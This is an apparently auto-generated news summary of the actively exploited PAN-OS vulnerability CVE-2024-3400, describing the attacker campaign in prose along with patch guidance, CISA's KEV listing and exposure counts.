April 20, 2024 at 01:57AM
Palo Alto Networks has disclosed a critical security flaw, CVE-2024-3400, in PAN-OS being actively exploited by threat actors. The flaw allows unauthenticated remote shell command execution via a two-stage attack. The company has expanded patches to cover affected software versions and recommends applying hotfixes to mitigate potential threats. CISA has added this vulnerability to its Known Exploited Vulnerabilities catalog.
The meeting notes revolve around a critical security flaw, CVE-2024-3400, impacting PAN-OS, which is being actively exploited by threat actors in the wild. According to Palo Alto Networks, the vulnerability is a combination of two bugs in PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1. When chained together, these bugs can lead to unauthenticated remote shell command execution.
The threat actor behind the zero-day exploitation, UTA0218, carried out a two-stage attack named Operation MidnightEclipse. They used a backdoor called UPSTYLE to achieve command execution on susceptible devices. The initial persistence mechanism involved configuring a cron job that would use wget to retrieve a payload from an attacker-controlled URL, leading to the execution of specific commands and the download of reverse proxy tooling such as GOST.
Palo Alto Networks confirmed that device telemetry has no bearing on the problem and has expanded patches to cover commonly deployed maintenance releases.
In light of the active exploitation and availability of a proof-of-concept exploit code, users are recommended to apply the hotfixes as soon as possible. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has included the vulnerability in its Known Exploited Vulnerabilities (KEV) catalog, ordering federal agencies to secure their devices by April 19, 2024.
According to the Shadowserver Foundation, approximately 22,542 internet-exposed firewall devices are likely vulnerable to CVE-2024-3400, with the majority located in the U.S., Japan, India, Germany, the U.K., Canada, Australia, France, and China.
Please let me know if you need further information on this topic.